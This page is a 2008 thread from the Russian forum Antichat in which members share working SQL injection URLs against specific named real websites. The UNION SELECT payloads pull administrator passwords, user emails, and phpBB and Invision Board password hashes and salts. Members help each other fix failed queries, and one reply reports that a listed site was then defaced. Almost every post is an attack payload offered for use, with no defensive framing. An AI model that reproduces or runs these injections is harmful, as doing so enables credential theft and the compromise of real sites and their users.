ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5671  
Старый 09.06.2008, 22:41
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

эта тема для скулей. тебе сюда http://forum.antichat.ru/showthread.php?p=585987 пост #2464.
 
Ответить с цитированием

  #5672  
Старый 10.06.2008, 10:15
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Код:
http://www.donny.co.uk/rovers/news.php?ID=-57+union+select+1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11+from+zenadmin/*
В information_schema.tables подглядел еще таблицы:
forums2_acl_users
phplist_rssitem_user
phplist_user_user
ttrss_users
Чтоб просмотреть их колонки надо будет зашифровать в hex.(Спасибо тохе )

Код:
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password,user_email,10+from+phpbb_users+limit+1,1/*

Последний раз редактировалось SUBJECT617; 10.06.2008 в 10:46.. Причина: yables...
 
Ответить с цитированием

  #5673  
Старый 10.06.2008, 15:38
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию

Цитата:
Сообщение от SUBJECT617  
http://www.parkui.ru/news.php?id=-57+union+select+1,2,3,4,5,username,7,user_password ,user_email,10+from+phpbb_users+limit+1,1/*
Hacked by [WSWW] teAm
cупер хекеры мля =\ умно смотреть ачат а потом дефить
 
Ответить с цитированием

  #5674  
Старый 10.06.2008, 17:07
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

NFM, SUBJECT617,
вот верная таблица форума:
Цитата:
http://www.parkui.ru/news.php?id=-17+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,user_password),9,10+from+park_phpbb_users+limi t+1,1/*

Последний раз редактировалось sabe; 10.06.2008 в 17:15..
 
Ответить с цитированием

  #5675  
Старый 10.06.2008, 18:15
theli
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038

Репутация: 11
По умолчанию

Цитата:
http://untp.kiev.ua/test.php?id=1%20UNION%20ALL%20SELECT%201,2,databas e(),4,psevdo,6%20from%20pages%20%20/*
MySQL 4.0.27
но таблицу подобрал только одну да и то вряд ли полезную (да и колонки впадло подбирать)
Цитата:
http://untp.kiev.ua/adminka/
знать бы еще куда она смотрит
там же есть IPB, но его таблицы тоже не нашел
 
Ответить с цитированием

  #5676  
Старый 10.06.2008, 20:24
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Цитата:
Сообщение от theli  
там же есть IPB, но его таблицы тоже не нашел
там несложно догадаться
email+name
://untp.kiev.ua/test.php?id=1%20union%20 select%201,2,concat_ws(0x3a,email,name),4,5,6+from +untp.ibf_members
hash+salt
://untp.kiev.ua/test.php?id=1%20 union%20select%201,2,concat_ws(0x3a,converge_pass_ hash,converge_pass_salt),4,5,6+from+untp.ibf_membe rs_converge
 
Ответить с цитированием

в антибояне нет
  #5677  
Старый 10.06.2008, 20:58
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию в антибояне нет

www.pchelenok.ru

Уязвимость в скрипте который отображает товары:

Код:
http://www.pchelenok.ru/index.php?action=show_item&parent=1'
Просмотр информации:

Код:
http://www.pchelenok.ru/index.php?action=show_item&parent=-00032308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
Информация о базе:
Код:
4.1.22
pchelenok_mysql@10.1.46.118
pchelenok_db
 
Ответить с цитированием

  #5678  
Старый 10.06.2008, 21:39
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Я канешн понимаю что недохек, но таблицы хоть немного похожей на таблицу юзверей я не нашел, да БД мне заявила что таблицы parol не существует, хотя как видно из урла ниже она там есть.
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,table_name,6+from+information_schema.tables/*

А вот и колонки таблицы парол
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,column_name,6+from+information_schema.columns+where+table_name=0x7061726f6c/*

Мож вы разберетесь...
 
Ответить с цитированием

  #5679  
Старый 10.06.2008, 22:42
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Ув. тов. SUBJECT617, все очень просто: БД, с которой работает скрипт называется "mitsubis_auto", а таблица parol в БД "test". Правильный запрос будет:
Код:
http://www.mitsubishi-autoluks.com.ua/news.php?id=-85+union+select+1,2,3,4,unhex(hex(passvord)),6+from+test.parol/*
Вы не учитываете поле таблицы INFORMATION_SCHEMA.TABLES table_schema.
 
Ответить с цитированием

  #5680  
Старый 10.06.2008, 22:42
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

нету таблицы parol изза того что не из той базы просиш.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ